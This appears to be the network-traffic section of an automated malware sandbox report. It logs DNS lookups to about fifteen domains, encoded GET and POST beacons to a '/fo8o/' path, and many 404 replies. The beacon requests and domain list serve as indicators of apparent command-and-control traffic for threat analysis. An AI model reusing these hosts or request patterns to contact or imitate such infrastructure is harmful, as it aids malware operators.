Source: global traffic	HTTP traffic detected: GET /fo8o/?BR14=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&D0=YnO0xF1X40 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Source: global traffic	DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic	DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic	DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic	DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic	DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic	DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic	DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic	DNS traffic detected: DNS query: www.techchains.info
Source: global traffic	DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic	DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic	DNS traffic detected: DNS query: www.660danm.top
Source: global traffic	DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic	DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.k9vyp11no3.cfd
Source: global traffic	DNS traffic detected: DNS query: www.shenzhoucui.com

Source: unknown

HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 193Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 42 52 31 34 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 50 50 79 59 69 4b 42 38 36 6c 7a 63 5a 6b 61 77 50 58 34 75 59 6e 62 56 47 42 5a 47 Data Ascii: BR14=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfPPyYiKB86lzcZkawPX4uYnbVGBZG

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 31 Dec 2024 08:28:49 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 31 Dec 2024 08:29:13 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 31 Dec 2024 08:29:15 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 31 Dec 2024 08:29:18 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 31 Dec 2024 08:29:20 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 31 Dec 2024 08:31:10 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 31 Dec 2024 08:31:13 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 31 Dec 2024 08:31:15 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 31 Dec 2024 08:31:18 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 31 Dec 2024 08:31:24 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 31 Dec 2024 08:31:26 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this 